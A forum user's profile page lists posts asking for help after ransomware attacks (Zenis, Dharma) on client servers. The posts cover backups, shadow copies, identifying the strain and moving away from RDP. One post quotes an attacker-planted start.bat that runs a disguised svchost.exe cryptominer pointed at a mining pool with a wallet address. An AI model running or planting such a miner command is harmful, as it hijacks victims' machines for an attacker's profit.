milopware (Member)

  • Content Count: 9
  • Joined
  • Last visited
  • Community Reputation: 0 Neutral

About milopware

  • Rank: New Member
  1. Oh dear, it says: Dharma (.cezar Family) This ransomware has no known way of decrypting data at this time. So it's a good job we had some really good backups, as we have recovered pretty much back to full capacity! We are currently using RDP but I think we need to look at alternative ways to get remote users connected; I'm told VPN is the way to go with this, but what is the best software to use?
  2. Hi, you guys were really helpful to me before when one of my clients' servers was attacked by Zenis and we were able to recover all data with the help you gave... I have another client who has experienced a ransomware attack; this time the ransom note is from [email protected]. We are in a good position as we stopped the attack before it was able to do too much damage (although it has still caused us a massive cleanup operation) and we also have some very good backups in place, so we were able to recover everything, but of course it is still costing my client some uncomfortable downtime...
  3. It seems my server is under attack again. I have installed Malwarebytes and it picked up the attack before it happened; not sure what the attacker's intentions were, as data is still encrypted from the last attack... I have isolated some more files / folders... It seems the attacker has created 2 user 'profiles' in the Documents & Settings directory, one called sysyem (not a typo) and the other called support. The 'support' profile has WindowsHelpPanel.exe in the Desktop folder & in the My Documents / Downloads folder. Also found: C:\WINDOWS\WindowsHelpServices folder containing in
  4. The folder C:\windows\WindowsHelpPanel doesn't exist; would it be useful for me to do a data recovery and attempt to find this .exe file? And does this mean they have a copy of the malicious file now? (as per your initial comments above on Thursday)
  5. I've just been looking at another one of your cases and saw this about shadow copies: I have managed to recover some shadow copies but the ShadowExplorer software doesn't seem to 'see' them. Do you have any ideas why this would be? It can see shadow copies created after the event but nothing from the ones that were created before. Do they need to be 'mounted' by the system? And is this what you mean about having the hard disk plugged into another machine or booted from a disk?
  6. Please find attached the requested files. I have no idea what they are, but looking at them, could it be possible that the start.bat file has the encryption key in it?... From the start.bat file: C:\windows\WindowsHelpPanel\svchost.exe -l zec-eu1.nanopool.org:6666 -u t1Ynpy5dBWxuJsDTbYzAfNnuRpwLrX38vqJ/MindFlyer/[email protected] -p x. And is this where it was emailed to? Is there a way of determining which program was used to encrypt the files? I'm guessing there is a finite number of programs, so is there a way of telling by looking at one of the encrypted files? I think the
  7. Thanks for coming back to me. I have downloaded the scanner and the results are attached: Addition.txt, FRST.txt
  8. I did this and got the following: This ransomware is still under analysis. Please refer to the appropriate topic for more information. Samples of encrypted files and suspicious files may be needed for continued investigation. Not enough information is public about Zenis. Please check back later. Does this mean I've had a zero-hour attack?
  9. Hi all, I'm hoping someone can help me work out which ransomware has encrypted my files, as the method / ransom note etc. doesn't seem to match anything in the decryption software assistance page... My documents have all been renamed, all names are different; for example these files were .jpg but are now called Zenis-0b.0bUMIAhxyu6B / Zenis-0E.0EjBzgesopM2 / Zenis-2q.2qYIjYnApmsC. The ransom note is an html doc called Zenis-instructions.html as below: I have a feeling the <small hidden> text at the bottom could be the encryption key used, it just looks a bit random? Can anyone hel